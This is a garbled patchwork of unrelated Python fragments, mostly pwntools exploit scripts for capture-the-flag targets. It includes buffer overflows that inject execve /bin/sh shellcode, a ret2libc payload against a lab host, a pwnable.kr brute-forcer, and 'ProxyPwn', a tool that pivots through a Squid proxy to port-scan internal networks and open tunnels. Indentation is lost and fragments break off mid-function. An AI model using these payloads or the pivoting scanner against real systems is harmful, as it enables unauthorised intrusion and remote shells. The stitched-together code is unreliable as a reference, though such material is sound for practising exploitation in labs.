def _start(self):
for ip_addr in IPNetwork(self.range):
print("")
info("Scanning host {0} for port range {1}-{2}".format(
ip_addr, self.start_port, self.end_port))
for port in range(self.start_port, self.end_port):
with semaphore:
thr = Thread(target=self._prod_port,
args=((ip_addr, port), ),
name="portscan_{0}".format(port))
thr.start()
write("Scanning port: {0} \r".format(port))
return None
def Exploit(fichier, pattern):
regex = pattern
file = fichier
pwn.info("Opening file: {fichier}\n".format(fichier=file))
s = pwn.read(file)
pwn.info("Searching for pattern: {flag}\n".format(flag=regex))
c = re.findall(regex, str(s))
if not c:
pwn.warn("No flag for you my friend, check your regex")
else:
for a in c:
pwn.success("Yeah !!!! flag found: {result}\n".format(result=a))
pwn.warn("flag is now copied in flag.txt")
pwn.write("flag.txt", a)
def Online(url, pattern):
regex = pattern
file = url
pwn.info("Opening file: {fichier}\n".format(fichier=file))
r = requests.session()
s = r.get(file)
s = s.content
pwn.info("Search for pattern: {flag}\n".format(flag=regex))
c = re.findall(regex, str(s))
if not c:
pwn.warn("No flag for you my friend, check your regex")
else:
for a in c:
pwn.success("Yeah !!!! flag found: {result}\n".format(result=a))
pwn.warn("flag is now copied in flag.txt")
pwn.write("flag.txt", a)
def _create_tunnel(self):
"""
Creates a TCP tunnel for a certain port using proxytunnel.
"""
proc = Popen([
"proxytunnel", "-p", ':'.join([
self.proxy_addr, str(self.proxy_port)
]), '-d', ':'.join([self.host_addr, str(self.port)]), '-a',
str(self.tunnel_port)
],
stdout=PIPE,
stderr=PIPE,
shell=False)
if self._check_tunnel() is True:
info("Tunneling established: {0}:{1} <---> {2}:{3} <---> you:{4}".
format(self.host_addr, self.port, self.proxy_addr,
self.proxy_port, self.tunnel_port))
self.is_active = True
self.pid = proc.pid
else:
info("Tunneling failed.")
def _prod_port(self, conn_info):
"""
param: (str, int) => (ip, port)
"""
with semaphore:
name = currentThread().getName()
pool.makeActive(name)
ip, port = conn_info
if self.passwd is None:
proc = Popen(
"curl --connect-timeout {0} -x '{1}:{2}' {3}:{4}".format(
DEFAULT_TIMEOUT, self.target_ip, self.target_port, ip,
port),
shell=True,
stdout=PIPE,
stderr=PIPE)
else:
proc = Popen(
"curl --connect-timeout {0} -x '{1}:{2}' {3}:{4} --proxy-user '{5}:{6}'"
.format(DEFAULT_TIMEOUT, self.target_ip, self.target_port,
ip, port, self.username, self.passwd),
shell=True,
stdout=PIPE,
stderr=PIPE)
stdout, stderr = proc.communicate()
for err in self.error_string.split(","):
if err.lower() in stdout.lower():
pool.makeInactive(name)
return None
info("Open port: {0}".format(port))
self.open_ports.append(port)
pool.makeInactive(name)
if self.tunnel is True:
tunnel = Tunnel((self.target_ip, self.target_port), (ip, port),
self.base_num) # creates a TCP tunnel
self.tunnels.append(tunnel) # register the tunnel
return port
def third_attempt(remote):
length_before_return_address = 0x14
write_address = 0x08048087
payload = b'A' * length_before_return_address + pwn.p32(write_address)
remote.send(payload)
esp_bytes = 4
bytes_to_receive = 0x14
esp = pwn.u32(remote.recv(esp_bytes))
pwn.info('ESP was %d' % esp)
remote.recv(bytes_to_receive - esp_bytes) # Not used
# shellcode = pwn.asm(pwn.shellcraft.sh()) # too long, manually reduced below
shellcode = pwn.asm(
'''
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
xor ecx, ecx
xor edx, edx
/* call execve() */
push 11 /* 0xb */
pop eax
int 0x80
''')
payload = b'A' * length_before_return_address + \
pwn.p32(esp + length_before_return_address) + \
shellcode
assert len(payload) <= 60, len(payload)
remote.send(payload)
remote.sendline('cat /home/start/flag')
pwn.success('Flag is: %s' % remote.recvuntil('\n').rstrip().decode('utf8'))
remote.interactive()
def close(self):
"""
Kills an open TCP tunnel proccess.
"""
if type(self.pid) is not int or self.pid < 1:
info("Tunnel proccess pid is not set. [{0}:{1}]".format(
self.host_addr, self.port))
info("Killing tunnel for {0}:{1}".format(self.host_addr, self.port))
try:
kill(self.pid, 9)
return True
except Exception as e:
info("Could not kill tunnel proccess!")
return None
def callb(self, r):
while True:
client_input = r.recvrepeat(self.wait_for_response)
if len(client_input) < 1:
sleep(0.1)
continue
pwn.info("Recieved: " + pwn.hexdump(client_input))
pk = HSZFPacket()
pk.parse(client_input)
if pk.identifier == Identifier.REQUEST:
uds_data = pk.uds_packet.get_full_packet()
if len(uds_data) < 1:
data = 0x00
else:
data = unpack_all(uds_data)
# ECU identifier
if pk.reciever != 0x37 or pk.sender != 0x13:
response_data = self.sid_switch(0x33)(0x33, r, pk)
else:
response_data = self.sid_switch(data)(data, r, pk)
response = HSZFPacket()
response.create(response_data, pk.reciever, pk.sender)
pwn.info("Sending the response: " +
pwn.hexdump(response.get_full_packet()))
r.send(response.get_full_packet())
if data == 0x22F100:
pwn.info("--Got Session Request--\n" +
pwn.hexdump(pk.uds_packet.get_full_packet()))
response = HSZFPacket()
response.create(b'\x62\xF1\x00\x01\x81\x00\x01',
pk.reciever, pk.sender)
pwn.info("Sending the response: " +
pwn.hexdump(response.get_full_packet()))
r.send(response.get_full_packet())
r.clean_and_log()
The problem is that movdqa requires any memory address to be 16-byte aligned.
The solution below bruteforces each round by trying up to 16 different byte offsets.
"""
solution = [8, 16, 32]
solved_rounds = len(solution)
keep_running = True
while keep_running:
solved_round = False
for i in range(0, 16):
with pwn.context.local(log_level='error'):
io = pwn.remote('pwnable.kr', 9022)
next_number_to_try = 2 ** (solved_rounds + 3) + i
io.recvuntil('No fancy hacking, I promise :D\n')
pwn.info("Round %d: Trying %d (+%d)" % (solved_rounds, next_number_to_try, i))
for round in range(0, 10):
if round < solved_rounds:
io.sendline(str(solution[round]))
elif round == solved_rounds:
io.sendline(str(next_number_to_try))
else:
io.sendline(str(2 ** (round + 3)))
io.recv()
io.recvuntil('ok, lets run the experiment with your configuration\n')
newlines_per_solved_round = 4
with pwn.context.local(log_level='error'):
results = io.recvall()
lines = results.strip().split(b'\n')
progress_to_round = int(len(lines) / newlines_per_solved_round) - 1
def bound_handler(output_path):
with open(output_path, "r") as output_file:
data = output_file.read()
info(data)
return data
def binExtract(cible): # {{{
pwn.info("Extraction en cours de {}".format(cible))
binwalk.scan(cible, signature=True, extract=True)
def binScan(cible): # {{{
pwn.info("Scan en cours de {}".format(cible))
binwalk.scan(cible, signature=True, extract=False)
def reverseString(a): # {{{
x = str(a)[::-1]
pwn.info("nous testons le mot {}".format(a))
testString(x, baseString)
return # }}}
import pwn
remote = True
if remote:
io = pwn.remote('challenges1.france-cybersecurity-challenge.fr', 4000)
else:
io = pwn.process(elf.path)
pwn.context.log_level = 'debug'
elf = pwn.context.binary = pwn.ELF('poney')
offset = 40
shell = pwn.p64(elf.symbols.shell)
payload = "A" * offset + shell
pwn.info("Shell address: %#x ", elf.symbols.shell)
pwn.info("Little Endian shell address: %s ", shell)
pwn.info("Payload: %s ", payload)
io.sendline(payload)
io.interactive()
io.close()
import pwn host = "192.168.1.251" port = 2998 r = pwn.remote(host,port) message = r.recv(1024) number = int.from_bytes(message, byteorder='little', signed=False) pwn.info(str(number)) r.sendline(str(number)) pwn.success(r.recvline().strip()) r.close()
for ip_addr in IPNetwork(self.range):
print("")
info("Scanning host {0} for port range {1}-{2}".format(
ip_addr, self.start_port, self.end_port))
for port in range(self.start_port, self.end_port):
with semaphore:
thr = Thread(target=self._prod_port,
args=((ip_addr, port), ),
name="portscan_{0}".format(port))
thr.start()
write("Scanning port: {0} \r".format(port))
return None
if __name__ == "__main__":
info("ProxyPwn - zc00l super proxy pivot scanning/tunneling script")
parser = ArgumentParser()
parser.add_argument("--target", help="Squid IP:port", required=True)
parser.add_argument("--range",
help="IP network range to scan.",
required=True)
parser.add_argument("--error-string",
help="Error string",
type=str,
default="denied,fail")
parser.add_argument("--port-range",
help="Port range to scan in format: X,Y",
type=str,
default="1,1024")
parser.add_argument("--threads",
help="How many threads to use",
import sys,json
from pwn import success,log,info
if len(sys.argv)!=3:
log.critical("error")
info("Usage: python find.py file_in_db 'reg1(&|)reg2'")
info("we will find out reg1 and(or) reg2 == 0 for you")
info("Example: python find.py libc 'rax&rbx'")
exit(0)
filename="./db/"+sys.argv[1]
inputbuf=sys.argv[2]
check=0
if '&' in inputbuf:
check=1
regs=inputbuf.replace("&"," ").split()
else:
regs=inputbuf.replace("|"," ").split()
fp=open(filename,"r")
while True:
tmp=fp.readline()
if not tmp or tmp=='\n':
break
res=json.loads(tmp[:-1])
if check:
if res.get(regs[0])==0 and res.get(regs[1])==0:
printbuf=''
for i,j in res.items():
printbuf+=i+":"+hex(j)+" "
printbuf+="\n"
import pwn
host = "192.168.1.251"
port = 2999
r = pwn.remote(host, port)
message = r.recvline().strip()
number = int(message.decode().split("'")[1])
pwn.info(message)
r.sendline(pwn.p32(number))
pwn.success(r.recvline().strip())
r.close()
import pwn
host = "192.168.1.251"
port = 2995
r = pwn.remote(host, port)
offset = 531
junk = b"\x00" + b"A" * offset
libc_addr = 0xb7e97000 # cat /proc/$(pidof final0)/maps
system_addr = libc_addr + 0x00038fb0 # readelf -s /lib/libc-2.11.2.so | grep -i system
exit_addr = libc_addr + 0x0002f0c0 # readelf -s /lib/libc-2.11.2.so | grep -i exit
bin_sh = libc_addr + 0x11f3bf # strings -atx /lib/libc-2.11.2.so | grep "/bin/sh"
pwn.info("system address: 0x%x" % system_addr)
pwn.info("exit address: 0x%x" % exit_addr)
pwn.info("/bin/sh address: 0x%x" % bin_sh)
payload = junk + pwn.p32(system_addr) + pwn.p32(exit_addr) + pwn.p32(bin_sh)
r.sendline(payload)
r.interactive()
r.close()
